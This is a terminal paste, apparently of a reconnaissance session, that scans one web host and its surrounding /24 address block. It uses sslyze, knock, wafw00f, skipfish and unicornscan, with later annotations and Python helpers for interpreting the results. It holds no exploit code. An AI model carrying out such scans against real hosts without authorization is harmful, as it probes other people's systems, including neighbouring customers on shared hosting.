Network Distance: 17 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 3.37 ms 192.168.1.1
2 ...
3 10.25 ms 172.17.19.169
4 13.05 ms 172.17.18.61
5 13.14 ms 172.19.240.133
6 12.84 ms 93.186.128.245
7 10.91 ms 195.22.205.155
8 11.54 ms 4.68.111.165
9 ...
10 106.27 ms 4.15.136.118
11 106.89 ms 184.168.6.83
12 106.79 ms 184.168.6.83
13 ... 16
17 108.63 ms 198.71.232.3

NSE: Script Post-scanning.
Initiating NSE at 12:58
Completed NSE at 12:58, 0.00s elapsed
Initiating NSE at 12:58
Completed NSE at 12:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3216.79 seconds
Raw packets sent: 4123 (155.388KB) | Rcvd: 42 (2.672KB)


  702. USE SSLYZE
  703.  
  704. ┌─[root@parrot]─[~]
  705. └──╼ #sslyze --regular 198.71.232.3:443
  706.  
  707.  
  708. REGISTERING AVAILABLE PLUGINS
  709. -----------------------------
  710.  
  711. PluginSessionRenegotiation
  712. PluginCompression
  713. PluginSessionResumption
  714. PluginCertInfo
  715. PluginOpenSSLCipherSuites
  716.  
  717.  
  718.  
  719. CHECKING HOST(S) AVAILABILITY
  720. -----------------------------
  721.  
  722. 198.71.232.3:443 => 198.71.232.3:443
  723.  
  724.  
  725.  
  726. SCAN RESULTS FOR 198.71.232.3:443 - 198.71.232.3:443
  727. ----------------------------------------------------
  728.  
  729. Unhandled exception when processing --compression:
  730. utils.ctSSL.errors.ctSSLFeatureNotAvailable - Could not enable Zlib compression: OpenSSL was not built with Zlib support ?
  731.  
  732. * Certificate :
  733. Validation w/ Mozilla's CA Store: Certificate is Trusted
  734. Hostname Validation: MISMATCH
  735. SHA1 Fingerprint: 95A592DAFDD9DCB8E55455991D1B5AE17F0FD2C7
  736.  
  737. Common Name: *.godaddysites.com
  738. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
  739. Serial Number: 4B09760F282ABD
  740. Not Before: Dec 9 21:03:50 2013 GMT
  741. Not After: Dec 9 21:03:50 2016 GMT
  742. Signature Algorithm: sha1WithRSAEncryption
  743. Key Size: 2048
  744. X509v3 Subject Alternative Name: DNS:*.godaddysites.com, DNS:godaddysites.com
  745.  
  746. * Session Renegotiation :
  747. Client-initiated Renegotiations: Honored
  748. Secure Renegotiation: Supported
  749.  
  750. Unhandled exception when processing --sslv2:
  751. utils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled.
  752.  
  753. * Session Resumption :
  754. With Session IDs: Not supported (0 successful, 5 failed, 0 errors, 5 total attempts).
  755. With TLS Session Tickets: Not Supported - TLS ticket assigned but not accepted.
  756.  
  757. * TLSV1_1 Cipher Suites :
  758.  
  759. Rejected Cipher Suite(s): Hidden
  760.  
  761. Preferred Cipher Suite:
  762. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  763.  
  764. Accepted Cipher Suite(s):
  765. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  766. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  767. AES256-SHA 256 bits HTTP 404 Not Found
  768. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  769. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  770. AES128-SHA 128 bits HTTP 404 Not Found
  771. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  772. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  773.  
  774. Unknown Errors: None
  775.  
  776. * TLSV1_2 Cipher Suites :
  777.  
  778. Rejected Cipher Suite(s): Hidden
  779.  
  780. Preferred Cipher Suite:
  781. ECDHE-RSA-AES256-GCM-SHA384 256 bits HTTP 404 Not Found
  782.  
  783. Accepted Cipher Suite(s):
  784. ECDHE-RSA-AES256-SHA384 256 bits HTTP 404 Not Found
  785. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  786. ECDHE-RSA-AES256-GCM-SHA384 256 bits HTTP 404 Not Found
  787. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  788. AES256-SHA256 256 bits HTTP 404 Not Found
  789. AES256-SHA 256 bits HTTP 404 Not Found
  790. AES256-GCM-SHA384 256 bits HTTP 404 Not Found
  791. ECDHE-RSA-AES128-SHA256 128 bits HTTP 404 Not Found
  792. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  793. ECDHE-RSA-AES128-GCM-SHA256 128 bits HTTP 404 Not Found
  794. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  795. AES128-SHA256 128 bits HTTP 404 Not Found
  796. AES128-SHA 128 bits HTTP 404 Not Found
  797. AES128-GCM-SHA256 128 bits HTTP 404 Not Found
  798. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  799. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  800.  
  801. Unknown Errors: None
  802.  
  803. * SSLV3 Cipher Suites :
  804.  
  805. Rejected Cipher Suite(s): Hidden
  806.  
  807. Preferred Cipher Suite: None
  808.  
  809. Accepted Cipher Suite(s): None
  810.  
  811. Unknown Errors: None
  812.  
  813. * TLSV1 Cipher Suites :
  814.  
  815. Rejected Cipher Suite(s): Hidden
  816.  
  817. Preferred Cipher Suite:
  818. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  819.  
  820. Accepted Cipher Suite(s):
  821. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  822. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  823. AES256-SHA 256 bits HTTP 404 Not Found
  824. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  825. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  826. AES128-SHA 128 bits HTTP 404 Not Found
  827. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  828. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  829.  
  830. Unknown Errors: None
  831.  
  832.  
  833.  
  834. SCAN COMPLETED IN 3.07 S
  835. ------------------------
  836.  
  What the scan above says: SSLv3 is off and the TLS 1.2 preferred suite (ECDHE-RSA-AES256-GCM-SHA384) is a sound choice, but TLS 1.0 and 1.1 are still enabled, 3DES (DES-CBC3-SHA, 112-bit) is accepted on every TLS version, static-RSA suites without forward secrecy (AES256-SHA, CAMELLIA128-SHA, ...) are accepted, session resumption does not work, and client-initiated renegotiation is honored. The SSLv2 check did not run, so SSLv2 is untested rather than confirmed off.
  
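To make a listing like the one above actionable, here is an added Python example (not part of the original paste and not SSLyze code) that parses text in the SSLyze layout shown above and flags what a reviewer would raise: SSLv2/SSLv3, TLS 1.0/1.1, 3DES and other sub-128-bit suites, suites without forward secrecy, and honored client-initiated renegotiation. The embedded input is a constructed excerpt in the same format as the scan output; on a real run, feed SSLyze's captured output to parse_accepted() instead.

```python
"""Triage an SSLyze cipher-suite listing (added example; not SSLyze code)."""
import re
from collections import defaultdict

# Constructed excerpt in the same layout as the SSLyze output above.
SSLYZE_OUTPUT = """\
Client-initiated Renegotiations: Honored
Secure Renegotiation: Supported

* TLSV1_1 Cipher Suites :

Rejected Cipher Suite(s): Hidden

Preferred Cipher Suite:
ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found

Accepted Cipher Suite(s):
ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
AES256-SHA 256 bits HTTP 404 Not Found
DES-CBC3-SHA 112 bits HTTP 404 Not Found

* TLSV1_2 Cipher Suites :

Accepted Cipher Suite(s):
ECDHE-RSA-AES256-GCM-SHA384 256 bits HTTP 404 Not Found
AES128-SHA256 128 bits HTTP 404 Not Found
DES-CBC3-SHA 112 bits HTTP 404 Not Found

* SSLV3 Cipher Suites :

Accepted Cipher Suite(s): None

* TLSV1 Cipher Suites :

Accepted Cipher Suite(s):
ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
DES-CBC3-SHA 112 bits HTTP 404 Not Found
"""

SECTION_RE = re.compile(r"^\* (\S+) Cipher Suites :")
SUITE_RE = re.compile(r"^([A-Z0-9-]+)\s+(\d+) bits")


def parse_accepted(text):
    """Return {protocol: [(suite, bits), ...]} built from the Accepted lists.
    Protocols with 'Accepted Cipher Suite(s): None' get an empty list."""
    accepted = defaultdict(list)
    proto, in_accepted = None, False
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            proto, in_accepted = m.group(1), False
            accepted.setdefault(proto, [])   # keep the key even if nothing is accepted
            continue
        if line.startswith("Accepted Cipher Suite(s):"):
            in_accepted = not line.rstrip().endswith("None")
            continue
        if line.startswith(("Preferred", "Rejected", "Unknown")):
            in_accepted = False              # the Preferred suite line is not a second accept
            continue
        m = SUITE_RE.match(line)
        if in_accepted and m:
            accepted[proto].append((m.group(1), int(m.group(2))))
    return dict(accepted)


def renegotiation_honored(text):
    """True when the server accepts client-initiated renegotiation (a DoS lever)."""
    return "Client-initiated Renegotiations: Honored" in text


def triage(accepted, reneg_honored):
    """Return [(tag, detail), ...] for everything worth writing up."""
    findings = []
    for proto in ("SSLV2", "SSLV3"):
        if accepted.get(proto):
            findings.append(("legacy_ssl", f"{proto} accepts cipher suites"))
    for proto in ("TLSV1", "TLSV1_1"):
        if accepted.get(proto):
            findings.append(("legacy_tls", f"{proto} still enabled"))
    for proto, suites in accepted.items():
        for suite, bits in suites:
            if "DES-CBC3" in suite or bits < 128:
                findings.append(("weak_suite", f"{proto}: {suite} ({bits} bits)"))
            elif not suite.startswith(("ECDHE-", "DHE-")):
                # Static RSA key exchange: a leaked private key decrypts old captures.
                findings.append(("no_pfs", f"{proto}: {suite}"))
    if reneg_honored:
        findings.append(("renegotiation", "client-initiated renegotiation honored"))
    return findings


if __name__ == "__main__":
    acc = parse_accepted(SSLYZE_OUTPUT)
    for tag, detail in triage(acc, renegotiation_honored(SSLYZE_OUTPUT)):
        print(f"{tag:14} {detail}")
```

The parser is a small state machine keyed on the "* PROTO Cipher Suites :" and "Accepted Cipher Suite(s):" headers, so it copes with the Preferred and Rejected blocks without double-counting, and an explicit "None" leaves the protocol present but empty, which is how SSLv3 shows up as clean.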
  837. Install knock
  838.  
  839. ┌─[root@parrot]─[~]
  840. └──╼ #wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  841. --2016-05-29 12:19:30-- https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  842. Resolving storage.googleapis.com (storage.googleapis.com)... 172.217.16.208, 2a00:1450:4001:801::2010
  843. Connecting to storage.googleapis.com (storage.googleapis.com)|172.217.16.208|:443... connected.
  844. HTTP request sent, awaiting response... 200 OK
  845. Length: 8484 (8.3K) [application/octet-stream]
  846. Saving to: ‘knock-1.5.tar.gz’
  847.  
  848. knock-1.5.tar.gz 100%[=====================>] 8.29K --.-KB/s in 0.002s
  849.  
  850. 2016-05-29 12:19:36 (4.03 MB/s) - ‘knock-1.5.tar.gz’ saved [8484/8484]
  851.  
  852. ┌─[root@parrot]─[~]
  853. └──╼ #ls
  854. Desktop Downloads Music Public Videos
  855. Documents knock-1.5.tar.gz Pictures Templates
  856.  
  857. ┌─[root@parrot]─[~]
  858. └──╼ #tar -xvzf knock-1.5.tar.gz
  859. knock.py
  860.  
  861. ┌─[root@parrot]─[~]
  862. └──╼ #cp knock.py Desktop
  863.  
  864. ┌─[root@parrot]─[~]
  865. └──╼ #cd Desktop/
  866.  
  867. ┌─[root@parrot]─[~/Desktop]
  868. └──╼ #chmod +x knock.py
  869.  
  870. USE KNOCK
  871.  
  872. $ python knock.py <option> <url>
  873.  
  874. Rapid Scan
  875.  
  876. Scanning with internal wordlist:
  877. $ python knock.py <url>
  878.  
  879. Scanning with external wordlist:
  880. $ python knock.py <url> <wordlist>
  881.  
  882. Options
  883. -zt Zone Transfer discovery:
  884.  
  885. $ python knock.py -zt <url>
  886. -dns Dns resolver:
  887.  
  888. $ python knock.py -dns <url>
  889. -wc Wildcard testing:
  890.  
  891. $ python knock.py -wc <url>
  892. -bw Wildcard bypass:
  893.  
  894. $ python knock.py -bw <stringexclude> <url>
  895.  
  896. ┌─[root@parrot]─[~/Desktop]
  897. └──╼ #./knock.py vyxunbnbs.com --wordlist /root/Desktop/rockyou.txt
  898. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  899.  
  900. [+] Testing domain
  901. www.vyxunbnbs.com 198.71.232.3
  902. [+] Dns resolving
  903. Domain name Ip address Name server
  904. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  905. Found 1 host(s) for vyxunbnbs.com
  906. [+] Testing wildcard
  907.  
  908. Wildcard enabled! Try with -bw option
  909. Example: knock -bw 404 vyxunbnbs.com
  910.  
  911. ┌─[root@parrot]─[~/Desktop]
  912. └──╼ #./knock.py -bw 404 vyxunbnbs.com
  913. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  914.  
  915. [+] Testing domain
  916. www.vyxunbnbs.com 198.71.232.3
  917. [+] Dns resolving
  918. Domain name Ip address Name server
  919. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  920. Found 1 host(s) for vyxunbnbs.com
  921. [+] Bypass wildcard
  922. 0.vyxunbnbs.com
  923. 01.vyxunbnbs.com
  924. 02.vyxunbnbs.com
  925. 03.vyxunbnbs.com
  926. 1.vyxunbnbs.com
  927.  
  928. --snip--
  929.  
  930. Found 1904 subdomain(s) in 523.4 second(s)
  931.  
  Because the zone has a wildcard, most of those 1904 names (0., 01., 02., ...) are not real hosts: every label resolves. -bw <stringexclude> only discards names whose response contains the given string (here "404"), so before treating any of them as a target, compare each name's A record (and its HTTP response) with the wildcard's and keep only the ones that differ.
  932.  
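Added Python example (not knock's own code) of the wildcard filter the run above needs: it resolves a few random labels to learn the wildcard answer, then keeps only candidate names whose answer differs from it. The zone is a constructed in-memory table so the example runs offline; make_resolver(), FAKE_ZONE and the host names in it are assumptions for the example, and on a live run you would pass a function that does a real lookup (for instance socket.gethostbyname_ex) in place of the fake resolver.

```python
"""Wildcard-aware subdomain brute force (added example; not knock's code)."""
import random
import string

# Constructed zone for an offline run: one wildcard plus two real hosts.
# The wildcard answers with the same IP as www, which is the awkward case.
FAKE_ZONE = {
    "www.vyxunbnbs.com": ["198.71.232.3"],
    "mail.vyxunbnbs.com": ["198.71.232.10"],
    "*.vyxunbnbs.com": ["198.71.232.3"],
}


def make_resolver(zone):
    """Build a resolve(name) -> set(ips) function over a dict zone that
    honours a single-level wildcard. Replace with a real lookup for live use."""
    def resolve(name):
        if name in zone:
            return set(zone[name])
        if "." not in name:
            return set()
        parent = name.split(".", 1)[1]
        return set(zone.get("*." + parent, ()))
    return resolve


def detect_wildcard(domain, resolve, probes=3):
    """Resolve a few random labels. If every one of them resolves, the zone
    has a wildcard and the union of their answers is the wildcard address set.
    An empty set means no wildcard."""
    wildcard_ips = set()
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase + string.digits, k=16))
        ips = resolve(f"{label}.{domain}")
        if not ips:
            return set()
        wildcard_ips |= ips
    return wildcard_ips


def brute_force(domain, words, resolve):
    """Return (wildcard_ips, {name: ips}) keeping only names whose answer is
    not fully explained by the wildcard. Limitation: a real host that shares
    the wildcard's IP (www here) is dropped too; telling those apart needs a
    second signal such as comparing HTTP responses, which is what knock's
    -bw option attempts."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found = {}
    for word in words:
        name = f"{word}.{domain}"
        ips = resolve(name)
        if not ips:
            continue
        if wildcard_ips and ips <= wildcard_ips:
            continue          # indistinguishable from the wildcard answer
        found[name] = ips
    return wildcard_ips, found


if __name__ == "__main__":
    wildcard, hosts = brute_force("vyxunbnbs.com", ["www", "mail", "0", "01", "ftp"],
                                  make_resolver(FAKE_ZONE))
    print("wildcard answers:", sorted(wildcard) or "none")
    for name, ips in sorted(hosts.items()):
        print(name, ", ".join(sorted(ips)))
```

Run against the constructed zone, the junk names (0, 01, ftp) disappear and mail survives; www is lost because it sits on the wildcard IP, which is exactly the gap a DNS-only filter has and the reason a response-based check is still needed afterwards.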
  933. CHECK IF THE SITE IS BEHIND A WEB APPLICATION FIREWALL (WAF)
  934.  
  935. ┌─[root@parrot]─[~]
  936. └──╼ #wafw00f 198.71.232.3
  937.  
  945.  
  946. WAFW00F - Web Application Firewall Detection Tool
  947.  
  948. By Sandro Gauci && Wendel G. Henrique
  949.  
  950. Checking http://198.71.232.3
  951. The site http://198.71.232.3 is behind a SecureIIS
  952. Number of requests: 9
  953.  
  Note: this run targets the bare IP over plain HTTP, so the Host header is the IP and the answer comes from whatever default site that address serves, not necessarily www.vyxunbnbs.com. Re-run against the hostname (wafw00f http://www.vyxunbnbs.com and https://www.vyxunbnbs.com) before trusting the fingerprint, and treat a WAF hit as a reason to rate-limit the active scans that follow.
  954.  
  955. CHECK THE SITE WITH SKIPFISH
  956.  
  957. ┌─[root@parrot]─[~]
  958. └──╼ #skipfish -o /tmp/snep http://www.vyxunbnbs.com
  959.  
  960. skipfish version 2.10b by lcamtuf@google.com
  961. - www.vyxunbnbs.com -
  962.  
  963. Scan statistics:   (final status screen; the live redraws overwrote each other in the capture)
  964.  
  965. Scan time : 0:00:32.334
  966. HTTP requests : 1728 (53.4/s), 7460 kB in, 408 kB out (243.3 kB/s)
  967. Compression : 5611 kB in, 26863 kB out (65.4% gain)
  968. HTTP faults : 1 net errors, 0 proto errors, 1 retried, 0 drops
  969. TCP handshakes : 19 total (90.9 req/conn)
  970. TCP faults : 0 failures, 0 timeouts, 8 purged
  971. External links : 5456 skipped
  972. Reqs pending : 0
  973.  
  974. Database statistics:
  975.  
  976. Pivots : 23 total, 22 done (95.65%)
  977. In progress : 0 pending, 0 init, 1 attacks, 0 dict
  978. Missing nodes : 0 spotted
  979. Node types : 1 serv, 1 dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
  980. Issues found : 6 info, 1 warn, 102 low, 39 medium, 0 high impact
  981. Dict size : 17 words (17 new), 2 extensions, 256 candidates
  982. Signatures : 77 total
  983.  
  989. [+] Copying static resources...
  990. [+] Sorting and annotating crawl nodes: 23
  991. [+] Looking for duplicate entries: 23
  992. [+] Counting unique nodes: 14
  993. [+] Saving pivot data for third-party tools...
  994. [+] Writing scan description...
  995. [+] Writing crawl tree: 23
  996. [+] Generating summary views...
  997. [+] Report saved to '/tmp/snep/index.html' [0xed916f54].
  998. [+] This was a great day for science!
  999.  
  1000. ┌─[root@parrot]─[~]
  1001. └──╼ #firefox /tmp/snep/index.html
  1002.  
  The report's findings (6 info, 1 warn, 102 low, 39 medium, 0 high) are signature hits, not confirmed vulnerabilities; open /tmp/snep/index.html and verify each class by hand before writing it up. A run like this (1728 requests in about 32 seconds) is loud and shows up in the target's logs; if the WAF check above fired, cap the rate with skipfish's -l <max requests per second>.
  
  1003. CHECK THE SITE WITH UNICORNSCAN
  1004.  
  1005. ┌─[root@parrot]─[~]
  1006. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
  1007.  
  1008. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1009. using interface(s) eth0
  1010. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1011. sender statistics 199.2 pps with 3 packets sent total
  1012. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1013. TCP open 198.71.232.3:80 ttl 47
  1014. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1015. TCP open 198.71.232.3:443 ttl 47
  1016. listener statistics 72 packets recieved 0 packets droped and 0 interface drops
  1017. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1018. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1019.  
  1020. UDP Scan
  1021.  
  1022. ┌─[root@parrot]─[~]
  1023. └──╼ #unicornscan -mU -r200 -I 198.71.232.3:53
  1024.  
  1025.  
  1026. Where
  1027.  
  1028. __________________________________________________________________
  1029. -mU : is mode UDP
  1030. -I : Display Immediately
  1031. 198.71.232.3 : target IP
  1032. :53 : port number
  1033. -r200 : 200 Packets per second
  1034. ___________________________________________________________________
  1035.  
  1036. TCP Scan
  1037.  
  1038. ┌─[✗]─[root@parrot]─[~]
  1039. └──╼ #unicornscan -r500 -mT 198.71.232.1/24:80,443,445,339
  1040.  
  1041.  
  1042. Where
  1043.  
  1044. __________________________________________________________________
  1045. -mT : is mode TCP
  1046. 198.71.232.1/24 : target network range (the whole /24 block, 198.71.232.0-255)
  1047. :80,443,445,339 : ports
  1048. -r500 : 500 Packets per second
  1049. ___________________________________________________________________
  1050.  
  1051. Many other options can be passed. After -mT, an uppercase letter sets that TCP flag and a lowercase one clears it, so for an ACK scan use -mTsA (SYN off, ACK on):
  1052.  
  1053. SYN : -mT
  1054. ACK scan : -mTsA
  1055. Fin scan : -mTsF
  1056. Null scan : -mTs
  1057. Xmas scan : -mTsFPU
  1058. Connect Scan : -msf -Iv
  1059. scan with all options : -mTFSRPAUEC
  1060. Syn + osdetect : -eosdetect -Iv (-mT)
  1061. scan ports 1 through 5 : (-mT) host:1-5
  1062.  
  1063. Practical use case
  1064.  
  1065. Scanning for MySQL (3306) alongside HTTP (80) and HTTPS (443). Only 80 and 443 come back: a SYN scan reports just the ports that answered SYN/ACK, so 3306 is closed or filtered, and OS detection (-eosdetect) returned nothing usable here (OS `').
  1066.  
  1067. ┌─[root@parrot]─[~]
  1068. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
  1069. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1070. using interface(s) eth0
  1071. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1072. sender statistics 194.9 pps with 3 packets sent total
  1073. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1074. TCP open 198.71.232.3:80 ttl 47
  1075. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1076. TCP open 198.71.232.3:443 ttl 47
  1077. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1078. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
  
  --snip-- (the same warning repeats a further nine times)
  
  1088. listener statistics 193 packets recieved 0 packets droped and 0 interface drops
  1089. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1090. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1091.  
  The packet_parse.c warnings are capture-side noise, not answers from the target: the listener received frames whose IP total length exceeds its 1550-byte snapshot (usually segments coalesced by the NIC's receive offload before libpcap saw them) and skipped them. They do not affect the open-port result.
  
  1092. ┌─[root@parrot]─[~]
  1093. └──╼ #unicornscan -eosdetect -Iv -v vyxunbnbs.com
  1094. adding 198.71.232.3/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1095. using interface(s) eth0
  1096. added module payload for port 1900 proto 17
  1097. added module payload for port 80 proto 6
  1098. added module payload for port 5060 proto 17
  1099. added module payload for port 53 proto 17
  1100. added module payload for port 80 proto 6
  1101. added module payload for port 518 proto 17
  1102. scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
  1103. drone type Unknown on fd 4 is version 1.1
  1104. drone type Unknown on fd 5 is version 1.1
  1105. added module payload for port 1900 proto 17
  1106. added module payload for port 80 proto 6
  1107. added module payload for port 5060 proto 17
  1108. added module payload for port 53 proto 17
  1109. added module payload for port 80 proto 6
  1110. added module payload for port 518 proto 17
  1111. scan iteration 1 out of 1
  1112. using pcap filter: `dst 192.168.1.83 and ! src 192.168.1.83 and (tcp)'
  1113. using TSC delay
  1114. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1115. TCP open 198.71.232.3:80 ttl 47
  1116. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1117. TCP open 198.71.232.3:443 ttl 47
  1118. sender statistics 290.1 pps with 338 packets sent total
  1119. listener statistics 166 packets recieved 0 packets droped and 0 interface drops
  1120. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1121. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1122.  
  Note: with no port list given, unicornscan uses its built-in default TCP port set (the long `adding ... ports` line above), not all 65535 ports; to cover everything use host:1-65535, which is slower and far noisier at the default 300 pps.
  1152.  
  Connect scan (-msf) of the whole /24. Scope caveat: this range belongs to a shared hosting provider (the PTR record above is ip-198-71-232-3.ip.secureserver.net), so the neighbours it turns up are other customers' servers; leave them alone unless the engagement explicitly includes the block. A connect scan also completes the TCP handshake, so every host it reaches logs the connection.
  
  1153. ┌─[root@parrot]─[~]
  1154. └──╼ #unicornscan -msf -v -I 198.71.232.3/24
  1155. adding 198.71.232.0/24 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1156. using interface(s) eth0
  1157. scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
  1158. connected 192.168.1.83:39367 -> 198.71.232.3:443
  1159. TCP open 198.71.232.3:443 ttl 47
  1160. connected 192.168.1.83:31012 -> 198.71.232.5:443
  1161. TCP open 198.71.232.5:443 ttl 110
  1162. connected 192.168.1.83:7126 -> 198.71.232.4:443
  1163. TCP open 198.71.232.4:443 ttl 47
  1164. connected 192.168.1.83:32420 -> 198.71.232.7:443
  1165. TCP open 198.71.232.7:443 ttl 47
  1166. connected 192.168.1.83:6417 -> 198.71.232.6:443
  1167. TCP open 198.71.232.6:443 ttl 47
  1168. connected 192.168.1.83:64190 -> 198.71.232.4:80
  1169. TCP open 198.71.232.4:80 ttl 47
  1170. connected 192.168.1.83:36816 -> 198.71.232.6:80
  1171. TCP open 198.71.232.6:80 ttl 47
  1172. connected 192.168.1.83:56533 -> 198.71.232.7:80
  1173. TCP open 198.71.232.7:80 ttl 47
  1174. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1175. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 1722 and we have 1550
  1176. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1177. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1178. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
